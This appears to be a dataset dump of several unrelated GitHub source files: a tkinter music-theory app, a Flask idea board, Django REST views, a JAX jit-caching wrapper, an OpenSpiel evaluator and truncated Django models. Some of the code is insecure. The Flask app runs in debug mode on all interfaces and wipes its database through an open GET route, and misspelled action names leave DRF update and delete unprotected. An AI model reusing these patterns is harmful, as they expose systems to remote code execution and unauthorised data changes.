Image.open(resource_path(\"img/text/chord.png\"))\n chord = chord.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n chordphoto = ImageTk.PhotoImage(chord)\n\n GButton_987 = tk.Button(self.root)\n GButton_987['bd'] = 0\n GButton_987[\"bg\"] = \"#f0f0f0\"\n GButton_987[\"fg\"] = \"#000000\"\n GButton_987[\"justify\"] = \"center\"\n GButton_987[\"image\"] = chordphoto\n GButton_987.place(x=round(520 * 
self.coefficient), y=round(380 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_987[\"command\"] = self.GButton_987_command\n\n arrow = Image.open(resource_path(\"img/back_arrow.png\"))\n arrow = arrow.resize((round(122 * self.coefficient), round(122 * self.coefficient)))\n arrowphoto = ImageTk.PhotoImage(arrow)\n\n GButton_172 = tk.Button(self.root)\n GButton_172[\"bd\"] = 0\n GButton_172[\"fg\"] = \"#000000\"\n GButton_172[\"justify\"] = \"center\"\n GButton_172[\"image\"] = arrowphoto\n GButton_172.place(x=round(30 * self.coefficient), y=round(5 * self.coefficient), width=round(122 * self.coefficient), height=round(122 * self.coefficient))\n GButton_172[\"command\"] = self.GButton_172_command\n self.root.mainloop()\n\n def GButton_172_command(self):\n \"\"\"\n Switch to Selection screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.selection import Selection\n s = Selection(self.root)\n\n def GButton_181_command(self):\n \"\"\"\n Switch to Note screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.note import Note\n n = Note(self.root)\n\n def GButton_257_command(self):\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.interval import Interval\n i = Interval(self.root)\n\n def GButton_348_command(self):\n \"\"\"\n Switch to Key signature screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.key_signature import Key_signature\n k = Key_signature(self.root)\n\n def GButton_987_command(self):\n \"\"\"\n Switch to Chord screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.chords import Chord\n c = Chord(self.root)\n","repo_name":"vitoandolini99/theorite","sub_path":"src/notation.py","file_name":"notation.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
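All widget geometry above is authored against a 540-pixel-high base layout and scaled by coefficient = height / 540; for example, at a 1080-pixel-high resolution:

coefficient = 1080 / 540
assert round(450 * coefficient) == 900  # the 450px title doubles in width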
+{"seq_id":"42548890213","text":"from flask import Flask, render_template, request, redirect, url_for\napp = Flask(__name__)\n\nfrom tinydb import TinyDB, Query\ndb = TinyDB(\"db.json\")\nquery = Query()\n\n#募集アイデアを入れるリスト\nthreads=[]\ni = 0\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html', posts=db.all(), n=len(db), i=i)\n\n# jsonファイルに募集内容を追加\n@app.route(\"/add\")\ndef add_idea():\n data = {\n \"title\":request.args.get(\"title\"),\n \"contents\":request.args.get(\"contents\"),\n \"timespan\":request.args.get(\"timespan\"),\n \"occupation\":request.args.get(\"occupation\"),\n \"region\":request.args.get(\"region\"),\n \"like\": 0\n }\n if not db.search(query.idea==data):\n db.insert({\n \"idea\": data\n })\n return index()\n\n@app.route(\"/reply\")\ndef add_reply():\n db.update({\"reply\":request.args.get(\"reply\")})\n return index()\n\n\n# jsonファイル内のデータを消去する\n@app.route(\"/reset\")\ndef reset():\n if db is not None:\n db.purge()\n i = 0\n return render_template(\"index.html\", posts=db.all(), n=len(db))\n\n\nif __name__==\"__main__\":\n app.run(debug=True, port=5000, host=\"0.0.0.0\")\n","repo_name":"MaikoKamada/TeamE","sub_path":"最終発表/final_submit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6722257021","text":"def affine(x, W, b):\n # W * x +b -> output\n y = inner(x, W)\n y = plus (y, b)\n return y\n\ndef inner(y,x):\n # x・y -> output\n n = len(x)\n m = len(y)\n l = len(y[0])\n if len(x[0]) != m:\n print(\"Error: inner size\")\n exit\n else:\n #xのサイズが n*m になっていると想定\n #yのサイズは m*l\n z = [[0 for _ in range(l)] for _ in range(n)]\n #アクセス順を意識して高速化\n for i in range(n):\n for j in range(m):\n for k in range(l):\n z[i][k] += x[i][j]* y[j][k]\n return z\n\ndef plus(x,y):\n rowx = len(x)\n rowy = len(y)\n colx = len(x[0])\n coly = len(y[0])\n if rowx != rowy:\n print(\"Error: not match matrix row\")\n elif colx != coly:\n print(\"Error: not match matrix column\")\n else:\n for i in range(rowx):\n for j in range(colx):\n x[i][j] += y[i][j]\n \n return x\n\nif __name__ == \"__main__\":\n import numpy as np\n a = [[(i+1)*(j+1) for i in range(5)] for j in range(3)]\n W = [[i*2 for i in range(3)] for j in range(4) ]\n b = [[3-i for i in range(5)] for j in range(4)]\n print(a,W)\n print(b)\n y = affine(a,W,b)\n nx = np.array(a)\n nW = np.array(W)\n nb = np.array(b)\n ny = np.dot(nW, nx) + b\n print(ny == y)","repo_name":"shell720/My_Project","sub_path":"machine_learning/AutoEncoder/AutoEncoder/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37253197660","text":"from django.urls import path\n\nfrom recipes.web import views\nfrom recipes.web.views import show_index, edit_recipe, delete_recipe, recipe_details, RecipeCreateView\n\nurlpatterns = (\n path('', show_index, name='show index'),\n path('create/', views.RecipeCreateView.as_view(), name='create recipe'),\n path('edit/', edit_recipe, name='edit recipe'),\n path('delete/', delete_recipe, name='delete recipe'),\n path('details/', recipe_details, name='details'),\n\n\n)","repo_name":"SilviyaKolchakova/Recipes","sub_path":"recipes/recipes/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32464682773","text":"\nfrom jax.tree_util import tree_flatten, tree_map, tree_reduce\nfrom . import structure_util_core as su\nimport jax\nimport inspect\nfrom functools import wraps\n\nfrom jax.core import valid_jaxtype\n\nfrom typing import (Any, Callable, Generator, Hashable, Iterable, List, Literal,\n NamedTuple, Optional, Sequence, Tuple, TypeVar, Union,\n overload, cast)\n\n_CACHED_WRAPS = {}\n\n\nclass HashableTree:\n def __init__(self, tree):\n self.tree = tree\n # we save the current hash of the tree here, so that future in-place changes to the tree\n # which might change the hash cannot fool us...\n self.hash = self.hash_tree()\n \n def hash_tree(self):\n leaves, treedef = tree_flatten(self.tree)\n leaves = tuple(leaves)\n return hash((leaves, treedef))\n\n def __hash__(self):\n # add 1 to the hash so that nobody sneaky can construct the following tuple\n # to engineer a collision (probably not a big deal, but anyway...)\n return hash((self.hash, self.hash_tree())) + 1\n \n def __eq__(self, other):\n # technically, this equality could return False for trees that are\n # really the same if they started out different and then were\n # modified in place to become the same.\n # However, a false negative will only result in an unecessary recompilation\n # while a false positive will result in reusing an incorrect cached jitted function.\n\n if not isinstance(other, HashableTree):\n return False\n eq = self.hash == other.hash\n if not eq:\n return False\n try:\n eq = tree_reduce(lambda a,b: a and b, tree_map(lambda x,y: x==y, self.tree, other.tree), True)\n except:\n return False\n \n return eq\n\n def __str__(self):\n return f\"HashableTree<{self.tree}>\"\n\n\n# These are a bit hacky...\ndef split_jax_nonjax(tree):\n keep_static = lambda x: not valid_jaxtype(x) and isinstance(x, Hashable)\n jaxtype_tree = tree_map(lambda x: None if keep_static(x) else x, tree)\n nonjaxtype_tree = tree_map(lambda x: x if keep_static(x) else None, tree)\n\n return jaxtype_tree, nonjaxtype_tree\n\ndef merge_jax_nonjax(jax_tree, nonjax_tree):\n def merge(jt, njt):\n if njt == None:\n return jt\n else:\n return njt\n\n return tree_map(merge, jax_tree, nonjax_tree, is_leaf=lambda x: x is None)\n\n\ndef improved_static(wrapper, *outer_args, static_argnums=None , static_argnames=None, **outer_kwargs):\n\n wrapper_signature = inspect.signature(wrapper)\n wrapper_parameters = wrapper_signature.parameters\n wrapper_paramnames = list(wrapper_parameters.keys())\n\n if wrapper not in _CACHED_WRAPS:\n _CACHED_WRAPS[wrapper] = {}\n\n _CACHED_FUNCS = _CACHED_WRAPS[wrapper]\n\n # outer_static_argnums = static_argnums\n # outer_static_argnames = static_argnames\n\n # this decorator actually wraps a decorator (the argument \"wrapper\") itself, so we must return a decorator.\n # this function static_wrapper is what we will return.\n @wraps(wrapper)\n def static_wrapper(fun, *wrapper_args, static_argnums=None , static_argnames=None, static_returns=None, **wrapper_kwargs):\n\n # # Some checks to allow for default arguments specified in a decorator...\n # # this might be overly complicated a feature to have...\n # if outer_static_argnums is not None:\n # assert static_argnums is None, \"ambiguous setting for static_argnums in wrapper {fun}!\"\n # static_argnums = outer_static_argnums\n\n # if outer_static_argnames is not None:\n # assert static_argnames is None, \"ambiguous setting for static_argnames in wrapper {fun}!\"\n # static_argnames = outer_static_argnames\n\n # if len(outer_args) == 0:\n # assert 
len(wrapper_args) == 0, \"ambiguous args for wrapper {fun}!\"\n # wrapper_args = outer_args\n\n # for k,v in outer_kwargs.items():\n # assert k not in wrapper_kwargs, \"ambiguous kwargs for wrapper {fun}!\"\n # wrapper_kwargs[k] = v\n\n\n # check if static_argnums or static_argnames are specified as position arguments.\n def override_arg(value, name):\n if name in wrapper_paramnames and len(wrapper_args) >= wrapper_paramnames.index(name):\n value = wrapper_args[wrapper_argnames.index(name)]\n\n # canonicalize value as list:\n if isinstance(value, int) or isinstance(value, str):\n value = [value]\n if value is None:\n value = []\n\n return list(value)\n \n static_argnums = override_arg(static_argnums, 'static_argnums')\n static_argnames = override_arg(static_argnames, 'static_argnames')\n static_returns = override_arg(static_returns, 'static_returns')\n\n\n # get information about the function we are going to wrap.\n signature = inspect.signature(fun)\n parameters = signature.parameters\n parameter_list = list(parameters.keys())\n\n # canonicalize static_argnums and static_argnames some more: make them\n # refer to the same set of arguments as much as possible to maximize the\n # number of cache hits later.\n for name in static_argnames:\n num = parameter_list.index(name)\n if num not in static_argnums:\n if parameters[name].kind != parameters[name].KEYWORD_ONLY:\n static_argnums.append(num)\n \n for num in static_argnums:\n name = parameter_list[num]\n if name not in static_argnames:\n if parameters[name].kind != parameters[name].POSITIONAL_ONLY:\n static_argnames.append(name) \n\n # initialize cache for this function.\n if fun not in _CACHED_FUNCS:\n _CACHED_FUNCS[fun] = {}\n\n cached_calls = _CACHED_FUNCS[fun]\n \n # this is the function that we will actually return from this decorator.\n # it first computes all static arguments and checks a cache to see if this\n # function has been called with these static arguments before. If not,\n # then it calles the base wrapper (i.e. 
jax.jit) on a version of the base function\n # to wrap that has all the static arguments included via lexical capture.\n # Otherwise, it looks up this wrapped function in the cache and calls it.\n # Finally, we process the outputs of the function to add back in non-jaxtype outputs.\n # It is assumed that if the static arguments are the same and the non-static arguments\n # have the same shape, then the non-jaxtype outputs are also the same.\n @wraps(fun)\n def wrapped_fun(*args, **kwargs):\n \n # process the args to extract static arguments and prepare the\n # cache key.\n split_args = []\n structure_tree_args_statics = {}\n structure_tree_kwargs_statics = {}\n\n tree_args_statics = {}\n tree_kwargs_statics = {}\n for argnum, arg in enumerate(args):\n if not su.is_structure_tree(arg):\n jax_tree, nonjax_tree = split_jax_nonjax(arg)\n split_args.append(jax_tree)\n tree_args_statics[argnum] = nonjax_tree\n else:\n params_buffers, rest = su.split_non_static(arg)\n split_args.append(params_buffers)\n structure_tree_args_statics[argnum] = rest \n\n split_kwargs = {}\n for k, v in kwargs.items():\n if not su.is_structure_tree(v):\n jax_tree, nonjax_tree = split_jax_nonjax(v)\n split_kwargs[k] = jax_tree\n tree_kwargs_statics[k] = nonjax_tree\n else:\n params_buffers, rest = su.split_non_static(v)\n split_kwargs[k] = params_buffers\n structure_tree_kwargs_statics[k] = rest \n\n\n static_args = [arg if i in static_argnums else None for i, arg in enumerate(split_args)]\n static_kwargs = {\n k: split_kwargs.get(k) for k in static_argnames\n }\n\n cache_key = HashableTree({\n 'static_argnums': static_argnums,\n 'static_args': static_args,\n 'static_argnames': static_argnames,\n 'static_kwargs': static_kwargs,\n 'structure_tree_args_statics': structure_tree_args_statics,\n 'tree_args_statics': tree_args_statics,\n 'structure_tree_kwargs_statics': structure_tree_kwargs_statics,\n 'tree_kwargs_statics': tree_kwargs_statics,\n 'static_returns': static_returns,\n })\n\n # cache miss - define a function to wrap with the base wrapper.\n if cache_key not in cached_calls:\n def to_wrap(*args, **kwargs):\n args_with_statics = list(args)\n for i in range(len(args)):\n if i in static_argnums:\n args_with_statics[i] = static_args[i]\n elif i in structure_tree_args_statics:\n args_with_statics[i] = su.merge_trees(args_with_statics[i], structure_tree_args_statics[i])\n elif i in tree_args_statics:\n args_with_statics[i] = merge_jax_nonjax(args_with_statics[i], tree_args_statics[i])\n \n kwargs_with_statics = dict(kwargs)\n for k in kwargs:\n if k in static_argnames:\n kwargs_with_statics[k] = static_kwargs[k]\n elif k in structure_tree_kwargs_statics:\n kwargs_with_statics[k] = su.merge_trees(kwargs_with_statics[k], structure_tree_args_statics[k])\n elif k in tree_kwargs_statics:\n kwargs_with_statics[k] = merge_jax_nonjax(kwargs_with_statics[k], tree_kwargs_statics[k])\n values = fun(*args_with_statics, **kwargs_with_statics)\n\n if not isinstance(values, tuple):\n values = [values]\n \n # this should happen upon first tracing to populate the static parts of any structure trees\n # in the returned values.\n returned_structure_statics = {}\n split_values = list(values)\n for i, v in enumerate(values):\n if i in static_returns:\n jax_tree = None\n nonjax_tree = (v, 'manual_static')\n elif su.is_structure_tree(v):\n jax_tree, nonjax_tree = su.split_non_static(v)\n nonjax_tree = (nonjax_tree, 'structure_tree')\n else:\n jax_tree, nonjax_tree = split_jax_nonjax(v)\n nonjax_tree = (nonjax_tree, 'discovered_static')\n\n 
if cached_calls[cache_key]['returned_structure_statics'] is None:\n returned_structure_statics[i] = nonjax_tree\n split_values[i] = jax_tree\n if cached_calls[cache_key]['returned_structure_statics'] is None:\n cached_calls[cache_key]['returned_structure_statics'] = returned_structure_statics\n if len(split_values) == 1:\n return split_values[0]\n else:\n return tuple(split_values)\n\n # add this wrapped function to the cache.\n cached_calls[cache_key] = {}\n cached_calls[cache_key]['wrapped_func'] = wrapper(to_wrap, *wrapper_args, **wrapper_kwargs)\n cached_calls[cache_key]['returned_structure_statics'] = None\n\n wrapped = cached_calls[cache_key]['wrapped_func']\n\n args_without_statics = list(split_args)\n kwargs_without_statics = dict(split_kwargs)\n\n\n for i in static_argnums:\n if i < len(args):\n args_without_statics[i] = None\n for k in static_argnames:\n if k in kwargs:\n kwargs_without_statics[k] = None\n \n # add back cached static outputs to the jaxtype outputs.\n values = wrapped(*args_without_statics, **kwargs_without_statics)\n\n if not isinstance(values, tuple):\n values = [values]\n values = list(values)\n \n for i, (v, static_type) in cached_calls[cache_key]['returned_structure_statics'].items():\n if static_type == 'manual_static':\n values[i] = v\n elif static_type == 'structure_tree':\n values[i] = su.merge_trees(values[i], v)\n elif static_type == 'discovered_static':\n values[i] = merge_jax_nonjax(values[i], v)\n else:\n raise ValueError('unknown static type!')\n \n if len(values) == 1:\n return values[0]\n else:\n return tuple(values)\n\n\n return wrapped_fun\n\n return static_wrapper\n\n\njit = improved_static(jax.jit)\n","repo_name":"optimizedlearning/brachy","sub_path":"brachy/structure_util/static_wrapper.py","file_name":"static_wrapper.py","file_ext":"py","file_size_in_byte":13514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
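A hypothetical usage sketch of the module-level jit defined above: an argument that is not a valid JAX type (here a plain string) is split off as static, folded into the cache key, and merged back in at trace time, so the branch on it resolves during tracing.

import jax.numpy as jnp

@jit
def scale(x, mode):
    # `mode` is a string leaf -> captured statically, not traced
    return x * (2.0 if mode == "double" else 1.0)

y = scale(jnp.ones(3), "double")  # first call traces; repeat calls hit the cache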
+{"seq_id":"72379721707","text":"import pyspiel\n\n\ndef evaluate_bots(state, bots, rng):\n \"\"\"Plays bots against each other, returns terminal utility for each bot.\"\"\"\n for bot in bots:\n bot.restart_at(state)\n while not state.is_terminal():\n if state.is_chance_node():\n outcomes, probs = zip(*state.chance_outcomes())\n action = rng.choice(outcomes, p=probs)\n for bot in bots:\n bot.inform_action(state, pyspiel.PlayerId.CHANCE, action)\n state.apply_action(action)\n elif state.is_simultaneous_node():\n joint_actions = [\n bot.step(state)\n if state.legal_actions(player_id) else pyspiel.INVALID_ACTION\n for player_id, bot in enumerate(bots)\n ]\n state.apply_actions(joint_actions)\n else:\n current_player = state.current_player()\n action = bots[current_player].step(state)\n for i, bot in enumerate(bots):\n if i != current_player:\n bot.inform_action(state, current_player, action)\n state.apply_action(action)\n return state.returns()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/evaluate_bots.py","file_name":"evaluate_bots.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"}
+{"seq_id":"6269037905","text":"from ast import operator\nfrom django.shortcuts import redirect, render\nfrom rest_framework.viewsets import ModelViewSet\nfrom .serializers import CommentHyperlinkedModelSerializer, CommentListModelSerializer, PostListModelSerializer, PostBaseModelSerializer, PostCreateModelSerializer, PostRetrieveModelSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, action\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated, IsAdminUser\nfrom core.permissions import IsOwnerOnly\n\n\nfrom posts.models import Post, Comment\n\n# Create your views here.\n\n# 게시글 목록 + 게시글 생성 한번에\nclass PostListCreateView(generics.ListAPIView, generics.CreateAPIView): # ListAPIView에 작성된 get 함수와 return하는 list. APIView라고 명명하는게 좋은데 지금은 그냥 이렇게\n # list는 또 queryset, page 등을 담고있음. 이것들을 상속받아서 정의해줘야 함.\n # 즉, queryset과 serializer_class 는 항상 필수래\n # Create는 Post, List는 get형태로 짜여져있어서 하나의 class에 두개 기능 처리 가능. 이렇게 기능이 다 합쳐진게 ViewSet이래\n # 나중에 직접 사용해볼수록 직접 못만들어서 막히는 경우가 생긴대. 다 들어가서 보고 공부하고 그래야 한대\n queryset = Post.objects.all()\n serializer_class = PostListModelSerializer\n\n # 생성자 만들어주기. overriding으로\n # CreateAPIView의 post와 CreateAPIView가 상속받은 CreateModelMixin의 create 재정의\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n # 우리가 바꾼 부분\n # 작성자 받게 customizing\n # self.perform_create(serializer)\n if request.user.is_authenticated:\n instance = serializer.save(writer=request.user)\n else:\n serializer.save()\n\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n# 게시글 상세, 업데이트(수정), 삭제\n# View끼리 상속받는 것들이 포함되어 있는 경우들이 있어서 어떤 기능끼리 묶을지 알아야 하나봐? 걍 다 하나로 묶으면 안되나\n# 웹개발이랑 다르게 RESTFul하게 작성이 되어야 하는데, GET, PUT, PATCH, DELETE는 모두 url에 id값이 들어가있어야 해서 하나로 묶인대. 오호\n# 목록, 게시글생성은 GET/POST이 또 하나로 묶이고\n# API Guide에 있는 표처럼 기능별로 묶어야 하나봐\n# PUT, PATCH 차이. PUT은 자원의 전체를 교체. PATCH는 부분적으로 교체. 차이점은 알고 있어야 한대\n# UpdateView에 put, patch 따로 구분해서 함수 해놨음\nclass PostRetrieveUpdateView(generics.RetrieveAPIView, generics.RetrieveUpdateAPIView, generics.RetrieveDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostRetrieveModelSerializer\n\n\n \n\nclass PostModelViewSet(ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostListModelSerializer\n\n # def get_serializer_class(self):\n # if self.action == 'create':\n # return PostBaseModelSerializer\n # return super().get_serializer_class()\n\n def get_permissions(self):\n permission_classes = list()\n action = self.action\n if action == 'list':\n permission_classes = [AllowAny]\n elif action in ['create', 'retrieve']:\n permission_classes = [IsAuthenticated]\n elif action in ['update', 'partial_updage', 'destory']:\n permission_classes = [IsOwnerOnly]\n return [permission() for permission in permission_classes]\n\n @action(detail=True, methods=['get'])\n def get_comment_all(self, request, pk=None): # Post의 pk값을 가져와서 comment 가져오는 함수\n post = self.get_object() # 입력받는 값이 없어서 유효성검사 필요 없음. 
object가 없는 경우는 get_object가 걸러주니까\n comment_all = post.comment_set.all() # comment에서 post의 related_name 안정한 경우 이렇게 부르면 된대\n serializer = CommentListModelSerializer(comment_all, many=True)\n return Response(serializer.data)\n\n\n\nclass CommentModelViewSet(ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentHyperlinkedModelSerializer\n\n@api_view()\ndef calculator(request):\n # 1. 데이터 확인\n num1 = request.GET.get('num1', 0)\n num2 = request.GET.get('num2', 0)\n operators = request.GET.get('operators')\n\n # 2. 계산\n if operators == '+':\n result = int(num1) + int(num2)\n elif operators == '-':\n result = int(num1) - int(num2)\n elif operators == '*':\n result = int(num1) * int(num2)\n elif operators == '/':\n result = int(num1) / int(num2)\n else:\n result = 0\n\n # 3. 응답\n data = {\n 'type' : 'FBV', # 함수기반 view라고 명시해줄라고 FBV\n 'result' : result,\n\n }\n return Response(data) # DRF에서 제공해주는 API. Dictionary 형태로 넣어주면 됨\n\n\n# APIView 상속받아서 class 기반 Calculator 기능 만들어보기\nclass CalculatorAPIView(APIView):\n def get(self, request): # 클래스 기반으로 만들때(CBV)는 get 요청을 어떻게 처리할지 이해가 있어야 함. get 함수 만들면 됨\n # get요청을 받으면 이렇게 알아서 get함수 타게 해놨나봐\n # class에 있는 함수는 무조건 self 가져야 된대\n # 1. 데이터 확인\n num1 = request.GET.get('num1', 0)\n num2 = request.GET.get('num2', 0)\n operators = request.GET.get('operators')\n\n # 2. 계산\n if operators == '+':\n result = int(num1) + int(num2)\n elif operators == '-':\n result = int(num1) - int(num2)\n elif operators == '*':\n result = int(num1) * int(num2)\n elif operators == '/':\n result = int(num1) / int(num2)\n else:\n print('error')\n result = 0\n\n # 3. 응답\n data = {\n 'type' : 'CBV', # 클래스 기반 view라고 명시해줄라고 CBV\n 'result' : result,\n\n }\n return Response(data)\n \n def post(self, request):\n data = {\n 'type' : 'CBV',\n 'method' : 'POST',\n 'result' : 0,\n\n }\n return Response(data)\n\n# frontapp 열려고 해봄. 그냥 html 파일 열고 들어가면 No 'Access-Control-Allow-Origin' header is present on the requested resource. error 생겨서\n# 근데 이렇게 들어가도 결국 local 주소 타고 들어가서 data 불러오는 거라 안되네;; 어케하는거지\n# 1. 설치 chrome plugin에서 Allow CORS: Access-Control-Allow-Origin'\n# 2. 서버쪽 세팅\n# res.setHeader('Access-Control-Allow-origin', '*');\n# res.setHeader('Access-Control-Allow-Credentials', 'true'); // 쿠키 주고받기 허용\n# res.setHeader('Access-Control-Allow-origin', 'https://inpa.tistory.com');\n# 출처: https://inpa.tistory.com/entry/WEB-📚-CORS-💯-정리-해결-방법-👏 [👨💻 Dev Scroll]\ndef post_frontapp(request):\n return render(request, 'frontapp.html')","repo_name":"Django-Mission/django_mission_01-Choi-Korean","sub_path":"liongram-api/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
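The comments in the record above note that retrieve, update, and destroy group naturally into one detail view. A minimal sketch of that consolidation using DRF's stock RetrieveUpdateDestroyAPIView, reusing the record's own serializer and permission names (assumed importable as in that file):

from rest_framework import generics

class PostDetailView(generics.RetrieveUpdateDestroyAPIView):
    # One view serves GET (retrieve), PUT/PATCH (update) and DELETE (destroy),
    # all addressed by the object id in the URL, so the three-base mixin
    # combination in the record is unnecessary.
    queryset = Post.objects.all()
    serializer_class = PostRetrieveModelSerializer
    permission_classes = [IsOwnerOnly]  # assumption: owner-only writes, as in the ViewSet above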
+{"seq_id":"34683429734","text":"from functools import reduce\n\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models, transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.functional import cached_property\n\nfrom model_utils.models import TimeStampedModel\nfrom model_utils.tracker import FieldTracker\nfrom requests.compat import urljoin\nfrom rest_framework import serializers\n\nfrom etools_prp.apps.core.common import (\n FINAL_OVERALL_STATUS,\n FREQUENCY_LEVEL,\n INDICATOR_REPORT_STATUS,\n OVERALL_STATUS,\n PROGRESS_REPORT_STATUS,\n PRP_ROLE_TYPES,\n REPORTABLE_FREQUENCY_LEVEL,\n REPORTING_TYPES,\n)\nfrom etools_prp.apps.core.models import TimeStampedExternalSourceModel\nfrom etools_prp.apps.core.validators import JSONSchemaValidator\nfrom etools_prp.apps.indicator.constants import ValueType\nfrom etools_prp.apps.indicator.disaggregators import QuantityIndicatorDisaggregator, RatioIndicatorDisaggregator\nfrom etools_prp.apps.indicator.json_schemas import disaggregation_schema, indicator_schema\nfrom etools_prp.apps.indicator.utilities import convert_string_number_to_float\nfrom etools_prp.apps.partner.models import PartnerActivity\nfrom etools_prp.apps.utils.emails import send_email_from_template\n\n\ndef default_total():\n return dict([('c', 0), ('d', 1), ('v', 0)])\n\n\ndef default_value():\n return dict([('d', 1), ('v', 0)])\n\n\nclass Disaggregation(TimeStampedExternalSourceModel):\n \"\"\"\n Disaggregation module. For example: \n\n related models:\n core.ResponsePlan (ForeignKey): \"response_plan\"\n \"\"\"\n name = models.CharField(max_length=255, verbose_name=\"Disaggregation by\")\n # IP reporting ones won't have this fk.\n response_plan = models.ForeignKey(\n 'core.ResponsePlan',\n related_name=\"disaggregations\",\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n )\n active = models.BooleanField(default=True)\n\n class Meta:\n unique_together = ('name', 'response_plan')\n\n def __str__(self):\n return \"Disaggregation %s\" % (self.id, self.name)\n\n\nclass DisaggregationValue(TimeStampedExternalSourceModel):\n \"\"\"\n Disaggregation Value module. 
For example: Gender \n\n    related models:\n        indicator.Disaggregation (ForeignKey): \"disaggregation\"\n    \"\"\"\n    disaggregation = models.ForeignKey(\n        Disaggregation,\n        related_name=\"disaggregation_values\",\n        on_delete=models.CASCADE,\n    )\n    value = models.CharField(max_length=128)\n\n    # TODO: we won't allow these to be edited out anymore, so 'active' might\n    # not be as relevant anymore.\n    # See https://github.com/unicef/etools-partner-reporting-portal/issues/244\n    active = models.BooleanField(default=True)\n\n    class Meta:\n        unique_together = ('disaggregation', 'value')\n\n    def __str__(self):\n        return \"Disaggregation Value %s: %s\" % (self.id, self.value)\n\n\nclass IndicatorBlueprint(TimeStampedExternalSourceModel):\n    \"\"\"\n    IndicatorBlueprint module is a pattern for indicator\n    (here we set up basic parameters).\n    \"\"\"\n    NUMBER = 'number'\n    PERCENTAGE = 'percentage'\n    UNIT_CHOICES = (\n        (NUMBER, NUMBER),\n        (PERCENTAGE, PERCENTAGE),\n    )\n\n    SUM = 'sum'\n    MAX = 'max'\n    AVG = 'avg'\n    LATEST = 'latest'\n    RATIO = 'ratio'\n\n    QUANTITY_CALC_CHOICE_LIST = (\n        SUM,\n        MAX,\n        AVG,\n    )\n\n    RATIO_CALC_CHOICE_LIST = (\n        SUM,\n    )\n\n    QUANTITY_CALC_CHOICES = (\n        (SUM, SUM),\n        (MAX, MAX),\n        (AVG, AVG),\n    )\n\n    RATIO_CALC_CHOICES = (\n        (SUM, SUM),\n    )\n\n    CALC_CHOICES = (\n        (SUM, SUM),\n        (MAX, MAX),\n        (AVG, AVG),\n        (LATEST, LATEST),\n    )\n\n    QUANTITY_DISPLAY_TYPE_CHOICES = (\n        (NUMBER, NUMBER),\n    )\n\n    RATIO_DISPLAY_TYPE_CHOICES = (\n        (PERCENTAGE, PERCENTAGE),\n        (RATIO, RATIO)\n    )\n\n    DISPLAY_TYPE_CHOICES = QUANTITY_DISPLAY_TYPE_CHOICES + \\\n        RATIO_DISPLAY_TYPE_CHOICES\n\n    title = models.TextField(max_length=2048, db_index=True)\n    unit = models.CharField(max_length=10, choices=UNIT_CHOICES,\n                            default=NUMBER)\n    description = models.CharField(max_length=3072, null=True, blank=True)\n    code = models.CharField(max_length=50, null=True, blank=True, unique=True)\n    subdomain = models.CharField(max_length=255, null=True, blank=True)\n    disaggregatable = models.BooleanField(default=False)\n\n    calculation_formula_across_periods = models.CharField(\n        max_length=10, choices=CALC_CHOICES, default=SUM\n    )\n    calculation_formula_across_locations = models.CharField(\n        max_length=10, choices=CALC_CHOICES, default=SUM\n    )\n\n    display_type = models.CharField(\n        max_length=10, choices=DISPLAY_TYPE_CHOICES, default=NUMBER\n    )\n\n    # TODO: add:\n    # siblings (similar indicators to this indicator)\n    # other_representation (exact copies with different names for some random reason)\n    # children (indicators that aggregate up to this or contribute to this indicator through a formula)\n    # aggregation_types (potential aggregation types: geographic, time-periods ?)\n    # aggregation_formulas (how the total value is aggregated from the reports\n    # if possible)\n\n    def save(self, *args, **kwargs):\n        # Prevent from saving empty strings as code because of the unique\n        # together constraint\n        if self.code == '':\n            self.code = None\n        super().save(*args, **kwargs)\n\n    def clean(self):\n        \"\"\"\n        To check that the calculation method and display type being assigned\n        are appropriate based on type of unit.\n        \"\"\"\n        unit_to_valid_calc_values = {\n            self.NUMBER: list(map(lambda x: x[0], self.QUANTITY_CALC_CHOICES)),\n            self.PERCENTAGE: list(map(lambda x: x[0], self.RATIO_CALC_CHOICES)),\n        }\n        if 